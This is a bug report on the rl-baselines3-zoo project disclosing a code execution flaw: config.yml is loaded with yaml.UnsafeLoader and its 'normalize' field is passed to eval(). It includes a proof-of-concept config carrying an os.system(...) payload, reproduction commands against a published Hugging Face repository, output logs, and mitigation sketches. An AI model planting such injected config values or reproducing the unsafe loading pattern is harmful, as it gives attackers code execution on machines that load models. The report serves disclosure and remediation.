🐛 Bug
Description
The rl-baselines3-zoo model loading pipeline accepts remote config.yml files, parses them with yaml.UnsafeLoader, and later evaluates the normalize field with eval(). The file is loaded and the field is evaluated in get_saved_hyperparams() when users download and run third-party model repositories.
rl-baselines3-zoo/rl_zoo3/utils.py
Lines 425 to 438 in d29756c

```python
config_file = os.path.join(stats_path, "config.yml")
if os.path.isfile(config_file):
    # Load saved hyperparameters
    with open(os.path.join(stats_path, "config.yml")) as f:
        hyperparams = yaml.load(f, Loader=yaml.UnsafeLoader)
    hyperparams["normalize"] = hyperparams.get("normalize", False)
else:
    obs_rms_path = os.path.join(stats_path, "obs_rms.pkl")
    hyperparams["normalize"] = os.path.isfile(obs_rms_path)
# Load normalization params
if hyperparams["normalize"]:
    if isinstance(hyperparams["normalize"], str):
        normalize_kwargs = eval(hyperparams["normalize"])
```
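Removing eval() would not be sufficient on its own: the excerpt also loads config.yml with yaml.UnsafeLoader, which can construct arbitrary Python objects (for example via !!python/object/apply tags) before the normalize field is even read. Below is a hypothetical restricted loader, a sketch and not the project's code. It extends yaml.SafeLoader and allows only the collections.OrderedDict tag that PyYAML's default dumper emits for an OrderedDict, which matches the nested list-of-pairs layout of config.yml. The names ConfigLoader and load_config are made up for illustration, and the sketch assumes saved configs contain no other Python-specific tags; any such tag (even a legitimate one such as a tuple) is rejected with an error.

```python
from collections import OrderedDict
from typing import Any

import yaml

# Tag PyYAML's Representer uses when dumping a collections.OrderedDict.
_ORDERED_DICT_TAG = "tag:yaml.org,2002:python/object/apply:collections.OrderedDict"


class ConfigLoader(yaml.SafeLoader):
    """Hypothetical loader: plain YAML types plus OrderedDict, nothing else."""


def _construct_ordered_dict(loader: yaml.SafeLoader, node: yaml.Node) -> "OrderedDict[str, Any]":
    # The dumped form is a one-element sequence holding a list of [key, value] pairs.
    (pairs,) = loader.construct_sequence(node, deep=True)
    return OrderedDict((key, value) for key, value in pairs)


# Registered on the subclass only, so yaml.SafeLoader itself is unchanged.
ConfigLoader.add_constructor(_ORDERED_DICT_TAG, _construct_ordered_dict)


def load_config(text: str) -> Any:
    # Any other python/* tag falls through to SafeLoader's "undefined tag"
    # handler and raises a ConstructorError instead of building the object.
    return yaml.load(text, Loader=ConfigLoader)
```

With such a loader, a config.yml carrying a !!python/object/apply tag for anything other than OrderedDict fails to load rather than executing. The normalize value still needs separate handling, because it arrives as an ordinary YAML string.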
An attacker can publish a benign-looking model repository whose config.yml contains a malicious normalize field. When a victim downloads and loads the model using rl_zoo3 commands, the configuration file is deserialized and the attacker-controlled payload is evaluated, resulting in arbitrary code execution.
For example, the attacker's config.yml can contain:

```yaml
- - - batch_size
    - 256
  - - normalize
    - os.system('echo "You have been hacked!!!" && touch /tmp/hacked.txt')
```

This allows attackers to embed malicious commands in model configuration files and achieve remote code execution on victim machines during normal model loading and evaluation.
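The eval() call in get_saved_hyperparams() is what turns a plain string from config.yml into executed code. A minimal mitigation sketch (not the project's actual fix) is to parse the field with the standard library's ast.literal_eval, which accepts only Python literals and refuses calls such as os.system(...). The helper name parse_normalize_kwargs is hypothetical, and the sketch assumes that legitimate string values of normalize are written as dict literals like "{'norm_obs': True, 'norm_reward': False}"; a value written as a dict(...) call would also be rejected.

```python
import ast
from typing import Any


def parse_normalize_kwargs(value: str) -> dict[str, Any]:
    """Hypothetical stand-in for eval(hyperparams["normalize"]).

    Accepts only a Python dict literal; function calls, attribute access and
    names are rejected by ast.literal_eval instead of being executed.
    """
    try:
        parsed = ast.literal_eval(value)
    except (ValueError, SyntaxError) as exc:
        # literal_eval raises ValueError for calls like os.system(...)
        # and SyntaxError for text that is not valid Python at all.
        raise ValueError(f"refusing non-literal normalize value: {value!r}") from exc
    if not isinstance(parsed, dict):
        raise ValueError(f"normalize must be a dict literal, got {type(parsed).__name__}")
    return parsed


if __name__ == "__main__":
    print(parse_normalize_kwargs("{'norm_obs': True, 'norm_reward': False}"))
    try:
        parse_normalize_kwargs("os.system('touch /tmp/hacked.txt')")
    except ValueError as err:
        print("rejected:", err)
```

Called in place of eval(hyperparams["normalize"]), this would make the os.system(...) payload fail with a ValueError at load time instead of running.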
To Reproduce
I uploaded a proof-of-concept model repository to Hugging Face for reproduction: https://huggingface.co/XManFromXlab/ppo-BreakoutNoFrameskip-v4

```bash
python -m rl_zoo3.load_from_hub --algo ppo --env BreakoutNoFrameskip-v4 -orga XManFromXlab -f logs/
python -m rl_zoo3.enjoy --algo ppo --env BreakoutNoFrameskip-v4 -f logs/
```

In this example, running the above commands executes the attacker-controlled payload:

```bash
echo "You have been hacked!!!" && touch /tmp/hacked.txt
```

After execution, the file /tmp/hacked.txt exists, demonstrating successful arbitrary code execution.
Relevant log output / Error message
```
Loading latest experiment, id=1
Loading logs/ppo/BreakoutNoFrameskip-v4_1/BreakoutNoFrameskip-v4.zip
You have been hacked!!!
```

System Info
- OS: Linux-6.8.0-88-generic-x86_64-with-glibc2.39 # 89-Ubuntu SMP PREEMPT_DYNAMIC Sat Oct 11 01:02:46 UTC 2025
- Python: 3.12.3
- Stable-Baselines3: 2.8.0a2
- PyTorch: 2.10.0+cu128
- GPU Enabled: True
- Numpy: 2.4.2
- Cloudpickle: 3.1.2
- Gymnasium: 1.2.3
- OpenAI Gym: 0.26.2
Checklist
- I have checked that there is no similar issue in the repo
- I have read the SB3 documentation
- I have read the RL Zoo documentation
- I have provided a minimal and working example to reproduce the bug
- I've used the markdown code blocks for both code and stack traces.